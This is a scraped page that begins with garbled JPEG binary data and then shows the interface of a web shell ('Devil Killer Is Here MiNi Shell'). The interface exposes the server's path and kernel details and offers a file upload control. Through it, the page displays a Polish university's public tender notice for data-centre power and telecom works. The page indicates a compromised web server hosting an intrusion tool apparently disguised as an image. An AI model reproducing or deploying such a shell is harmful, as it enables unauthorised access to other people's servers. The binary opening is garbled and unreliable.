JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230727/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230727/0032932301-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wykonanie projektu rozbudowy i rozbudowa infrastruktury teletechnicznej oraz instalacji zasilania energetycznego Pomieszczeń Klastra Obliczeniowego w budynku Centrum Technologii Informatycznych PŁ </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Politechnika Łódzka Uczelniane Centrum Informatyczne</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000001583</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Wólczańska 223</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łódź</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">93-005</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL711 - Miasto Łódź</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">426383500</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">miroslaw.kopec@p.lodz.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zp.p.lodz.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie projektu rozbudowy i rozbudowa infrastruktury teletechnicznej oraz instalacji zasilania energetycznego Pomieszczeń Klastra Obliczeniowego w budynku Centrum Technologii Informatycznych PŁ </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4dd5e97b-2c7e-11ee-a60c-9ec5599dddc1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00329323</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-07-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Krajowy Magazyn Danych. Uniwersalna infrastruktura dla składowania i udostępniania danych oraz efektywnego przetwarzania dużych wolumenów danych w modelach HPC, Big Data i sztucznej inteligencji </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://plodz.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://plodz.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W niniejszym postępowaniu o<br/>udzielenie zamówienia składanie ofert, przekazywanie dokumentów lub oświadczeń oraz wymiana informacji między zamawiającym<br/>a wykonawcą, odbywa się przy użyciu<br/>środków komunikacji elektronicznej. 2. Korespondencję, powołując się w tytule na nazwę i numer postępowania, należy kierować:<br/>2.1. za pośrednictwem Platformy znajdującej się pod adresem:<br/>https://plodz.ezamawiajacy.pl w zakładce „Korespondencja”; 2.2. drogą elektroniczną na adres: miroslaw.kopec@p.lodz.pl. 3.<br/>Zgłoszenie do postępowania wymaga zalogowania wykonawcy do systemu na<br/>subdomenie Politechniki Łódzkiej https://plodz.ezamawiajacy.pl lub https://oneplace.marketplanet.pl 4. Wykonawca po wybraniu<br/>opcji „przystąp do postępowania” zostanie przekierowany na stronę https://oneplace.marketplanet.pl, gdzie zostanie powiadomiony<br/>o możliwości zalogowania lub założenia bezpłatnego konta. Wykonawca zakłada konto wykonując kroki procesu rejestracyjnego:<br/>podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje regulamin, używa polecenia<br/>„zarejestruj się”. 5. Rejestracja wykonawcy trwa maksymalnie do 2 dni roboczych, zamawiający zaleca zatem wykonawcom<br/>uwzględnienie czasu niezbędnego na rejestrację w procesie<br/>złożenia oferty w niniejszym postępowaniu. 6. Po założeniu konta wykonawca ma możliwość złożenia oferty w postępowaniu. Oferta<br/>musi być sporządzona w języku polskim i złożona pod rygorem nieważności w postaci elektronicznej za pośrednictwem Platformy<br/>dostępnej pod adresem<br/>https:/plodz.ezamawiajacy.pl. 7. W przypadku wątpliwości i problemów związanych z korzystaniem z Platformy, wykonawca może<br/>skorzystać z instrukcji zamieszczonych w jej zakładce pn. „Regulacje i<br/>procedury procesu zakupowego” lub skontaktować się z dostawcą tego rozwiązania informatycznego pod nr (22) 257-22-23 (infolinia<br/>dostępna w dni robocze, w godzinach 9.00-17.00), e-mail:oneplace@marketplanet.pl.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej „RODO”, zamawiający informuje, że:<br/>1. administratorem Pani/Pana danych osobowych jest Politechnika Łódzka, ul. Żeromskiego 116, 90-924 Łódź;<br/>2. kontakt z inspektorem ochrony danych osobowych Zamawiającego można uzyskać za pośrednictwem adresu e-mailowego:<br/>rbi@adm.p.lodz.pl;<br/>3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/>udzielenie niniejszego zamówienia publicznego;<br/>4. dane osobowe przetwarzane będą przez spółkę Otwarty Rynek Elektroniczny S.A. z siedzibą w Warszawie (02-672), przy ul.<br/>Domaniewskiej 49, wpisaną do Rejestru Przedsiębiorców Krajowego Rejestru Sądowego, prowadzonego przez Sąd Rejonowy dla<br/>m.st. Warszawy w Warszawie XIII Wydział Gospodarczy Krajowego Rejestru Sądowego pod numerem KRS: 0000041441, REGON:<br/>017282436, NIP: 526-25-35-153, jako właściciel Platformy Zakupowej, na której Politechnika Łódzka prowadzi postępowania o<br/>udzielenie zamówienia publicznego, działającą pod adresem: https://plodz.ezamawiajacy.pl;<br/>5. odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 18 oraz art. 74 Ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych, dalej „Ustawa”;<br/>6. Pani/Pana dane osobowe będą przechowywane przez okres 10 lat zgodnie z Jednolitym Rzeczowym Wykazem Akt Politechniki<br/>Łódzkiej;<br/>7. obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach Ustawy, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego - konsekwencje<br/>niepodania określonych danych wynikają z Ustawy;<br/>8. w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art.<br/>22 RODO;<br/>9. posiada Pani/Pan:<br/>9.1. na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>9.2. na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>9.3. na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>9.4. prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>10. nie przysługuje Pani/Panu:<br/>10.1. w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>10.2. prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>10.3. na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>11. Dane osobowe mogą być przekazywane do organów publicznych i urzędów państwowych lub innych podmiotów upoważnionych<br/>na podstawie przepisów prawa lub wykonujących zadania realizowane w interesie publicznym lub w ramach sprawowania władzy<br/>publicznej, w szczególności do podmiotów prowadzących działalność kontrolną wobec Zamawiającego. Dane osobowe są<br/>przekazywane do podmiotów przetwarzających dane w imieniu administratora danych osobowych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">UCI.262.1.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 564700 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 2.	Przedmiotem zamówienia który został opisany w Programie Funkcjonalno-użytkowym (PFU) jest zaprojektowanie i wykonanie rozbudowy infrastruktury teletechnicznej i telekomunikacyjnej oraz instalacji zasilania energetycznego Pomieszczenia Klastra Obliczeniowego w budynku Centrum Technologii Informatycznych (CTI) Politechniki Łódzkiej, na potrzeby instalacji serwerów „Platformy obsługi Krajowego Magazynu Danych -Łódź w formule zaprojektuj i wybuduj. <br/>Zamówienie obejmuje: <br/>2.1.	Zadanie 1a – wykonanie projektu architektonicznego etapowej zabudowy trzech kiosków teleinformatycznych z zimnym korytarzem po 6 szaf wysokości minimum 47U wymiarach 800x120 cm /kiosk, w Pomieszczeniu Klastra Obliczeniowego w budynku CTI PŁ:<br/>– etap 1 - zabudowa 1 wybranego kiosku teleinformatycznego, wskazanego na etapie wykonania projektu, wybranego z uwagi na minimalizację kosztów adaptacji systemów chłodzenia i koniecznych reinstalacji infrastruktury i systemów teleinformatycznych aktualnie zainstalowanych w Pomieszczeniach Klastra Obliczeniowego CTI PŁ, wraz z projektem adaptacji istniejących systemów chłodzenia zapewniającym chłodzenie w trybie roboczym (chłodzenie podstawowe) oraz awaryjnym (w przypadku awarii systemu chłodzenia podstawowego) wybranego kiosku,<br/>- etap 2 – pozostałe kioski z uwzględnieniem koncepcji dezinstalacji istniejących systemów chłodzenia i zastosowaniem systemu chłodzenia w oparciu o standardowe klimatyzatory rzędowe umieszczonymi pomiędzy szafami IT, działającymi w oparciu o czynnik DX (bezpośrednie odparowanie) lub alternatywnie ze skraplaczami chłodzonymi wodą i drycoolerami;<br/>2.2.	Zadanie 1b – wykonanie etapowego projektu teleinformatycznego okablowania światłowodowego 72J kiosków i wyposażenia szaf teleinformatycznych w moduły 2xPDU dla projektowanych kiosków:<br/>-	etap 1 – wybranego kiosku w tym projekt przełącznicy głównej pomieszczenia Klastra Obliczeniowego i kabla 72J do przełącznicy głównej zlokalizowanej w pomieszczeniach Centralnego Węzła Dystrybucyjnego (PG USK) budynku CTI ,<br/>-	etap 2 – pozostałych kiosków; <br/>2.3.	Zadanie 1c – wykonanie projektu budowlanego rurociągu teletechnicznego na potrzeby umieszczenia światłowodowego kabla sygnałowego systemów monitorujących system mobilnych agregatów prądotwórczych nie związanych z gruntem, umieszczonych na platformie ruchomej we wskazanym przez Zamawiającego miejscu na parkingu przy budynku CTI PŁ i projektu wykonawczego kabla światłowodowego 12J łączącego system mobilnych agregatów prądotwórczych z przełącznicą główną zlokalizowaną w pomieszczeniach Centralnego Węzła Dystrybucyjnego (PG USK) budynku CTI;<br/>2.4.	Zadanie 1d – wykonanie projektu budowlanego i wykonawczego kabli energetycznych (600kW) łączących system agregatów prądotwórczych 2X320 kW nie związanych z gruntem, umieszczonych na platformie ruchomej we wskazanym przez Zamawiającego miejscu na parkingu przy budynku CTI PŁ z infrastrukturą zasilania energetycznego urządzeń w pomieszczeniach Klastra Obliczeniowego, UPS i Centralnego Węzła Dystrybucyjnego oraz systemów ich chłodzenia (zakończenie kabli w ciągu głównych szaf rozdzielczych w Pomieszczeniu UPS przylegającym do Pomieszczenia Klastra Obliczeniowego i/lub piwnicy budynku);<br/>2.5.	Zadanie 1e – wykonanie projektów etapowej instalacji systemu agregatów prądotwórczych 2X320 kW oraz systemu modułowych UPS 2X200kW:<br/>-	etap 1 – projekt dostawy i instalacji agregatu prądotwórczego 1x320kV wraz z elementami synchronizacji, SZR i monitoringu, na potrzeby zasilania awaryjnego wybranego kiosku i szaf teleinformatycznych w pomieszczeniach Centralnego Węzła Dystrybucyjnego i systemów ich chłodzenia oraz UPS 1X200 kW na potrzeby sieci zasilania gwarantowanego urządzeń zainstalowanych w szafach,<br/>-	etap 2- projekt dostawy i instalacji drugiego agregatu prądotwórczego 1x320kV, na potrzeby uzupełnienia zasilania awaryjnego wszystkich kiosków i szaf teleinformatycznych w pomieszczeniach Centralnego Węzła Dystrybucyjnego i systemów ich chłodzenia oraz drugiego UPS 1X200 kW na potrzeby uzupełnienia sieci zasilania gwarantowanego urządzeń zainstalowanych w szafach;<br/>2.6.	Zdanie 1f – wykonanie etapowych projektów wykonawczych budowy sieci gwarantowanego zasilania kiosków teleinformatycznych oraz szaf teleinformatycznych w pomieszczeniu Centralnego Węzła Dystrybucyjnego z uwzględnieniem zasilania awaryjnego z projektowanych systemów agregatów prądotwórczych oraz istniejących i nowoprojektowanych UPS wraz z podłączeniem modułów PDU w szafach teleinformatycznych oraz niezbędną rozbudową sieci kabli elektroenergetycznych, szaf rozdzielczych i rozdzielnic:<br/>-	etap 1 - z uwzględnieniem czasowej instalacji mobilnego agregatu prądotwórczego na potrzeby zasilania awaryjnego wybranego kiosku i szaf teleinformatycznych w pomieszczeniach Centralnego Węzła Dystrybucyjnego i systemów ich chłodzenia oraz wydzieleniem 2xUPS z istniejącego systemu 5xUPS na potrzeby zasilania gwarantowanego urządzeń zainstalowanych w szafach a także docelową rozbudową szaf rozdzielczych i rozdzielnic dla pierwszego toru zasilania gwarantowanego (patrz etap 2 poniżej),<br/>-	etap 2 - z uwzględnieniem instalacji agregatu prądotwórczego 1x320kV wraz z elementami synchronizacji, SZR i monitoringu, na potrzeby zasilania awaryjnego wybranego kiosku i szaf teleinformatycznych w pomieszczeniach Centralnego Węzła Dystrybucyjnego i systemów ich chłodzenia oraz nowoprojektowanego UPS 1X200 kW na potrzeby sieci zasilania gwarantowanego urządzeń zainstalowanych w szafach, zgodnie z projektem Zadanie 1- etap1 (pierwszy tor zasilania gwarantowanego), <br/>-	etap 3 – z uwzględnieniem instalacji drugiego agregatu prądotwórczego 1x320kV, na potrzeby zasilania awaryjnego wszystkich kiosków i szaf teleinformatycznych w pomieszczeniach Centralnego Węzła Dystrybucyjnego i systemów ich chłodzenia oraz drugiego nowoprojektowanego UPS 1X200 kW na potrzeby uzupełnienia sieci zasilania gwarantowanego urządzeń zainstalowanych w szafach, zgodnie z projektem Zadanie 1e - etap 2 (drugi tor zasilania gwarantowanego);<br/>2.7.	Zadanie 2 – zabudowa 1 wybranego kiosku teleinformatycznego wraz z adaptacją istniejących systemów chłodzenia, zgodnie z projektem Zadanie 1a - etap 1;<br/>2.8.	Zadanie 3 - wybudowanie światłowodowego okablowania teleinformatycznego dla jednego wybranego kiosku, w tym instalacja docelowej przełącznicy głównej pomieszczenia Klastra Obliczeniowego i kabla 72J do przełącznicy głównej zlokalizowanej w pomieszczeniach Centralnego Węzła Dystrybucyjnego (PG USK) budynku CTI (razem 7 kabli 72J) oraz wyposażenie szaf teleinformatycznych w moduły PDU dla wybranego kiosku etap 1, zgodnie z projektem Zadanie 1b – etap1;<br/>2.9.	Zadanie 4 - budowa sieci gwarantowanego zasilania szaf wybranego kiosku teleinformatycznego oraz szaf teleinformatycznych w pomieszczeniu Centralnego Węzła Dystrybucyjnego budynku CTI, zgodnie z projektem Zadanie 1f -etap 1;<br/>2.10.	Zadanie 5 – budowa rurociągu teletechnicznego i kabla światłowodowego 12J łączącego system agregatów prądotwórczych z przełącznicą główną zlokalizowaną w pomieszczeniach Centralnego Węzła Dystrybucyjnego (PG USK) budynku CTI, zgodnie z projektem Zadanie 1c;<br/>2.11.	Zadanie 6 – budowa kabli energetycznych (600kW) łączących system agregatów prądotwórczych 2X320 kW nie związanych z gruntem, umieszczonych na platformie ruchomej we wskazanym przez Zamawiającego miejscu na parkingu przy budynku CTI PŁ z infrastrukturą zasilania energetycznego urządzeń w pomieszczeniach Klastra Obliczeniowego, UPS i Centralnego Węzła Dystrybucyjnego oraz systemów ich chłodzenia (zakończenie kabli w ciągu głównych szaf rozdzielczych w Pomieszczeniu UPS przylegającym do Pomieszczenia Klastra Obliczeniowego i/lub piwnicy budynku), zgodnie z projektem Zadanie 1d. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45300000-0 - Roboty instalacyjne w budynkach</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71000000-8 - Usługi architektoniczne, budowlane, inżynieryjne i kontrolne</p> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający udzieli zamówienia wykonawcy, którego oferta uzyska<br/>największą wartość punktową, zgodnie z zasadami opisanymi w Rozdziale XX SWZ pn. &#34;Opis<br/>kryteriów, którymi zamawiający będzie się kierował przy wyborze oferty, wraz z podaniem znaczenia<br/>tych kryteriów oraz sposobu oceny oferty&#34;. 2. Całkowita liczba punktów obliczona zostanie z<br/>dokładnością do dwóch miejsc po przecinku. 3. Zamawiający wybierze najkorzystniejszą ofertę bez<br/>przeprowadzenia negocjacji.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">warunki gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> zdolności technicznej lub zawodowej :<br/>-Wykonawca musi wykazać wykonanie nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej dwóch zamówień, których przedmiotem była budowa rozbudowa lub modernizacja serwerowni obejmująca min. instalacje elektroenergetyczne i chłodnicze o wartości brutto nie mniejszej niż 300 000 złotych każde,<br/>- Wykonawca musi 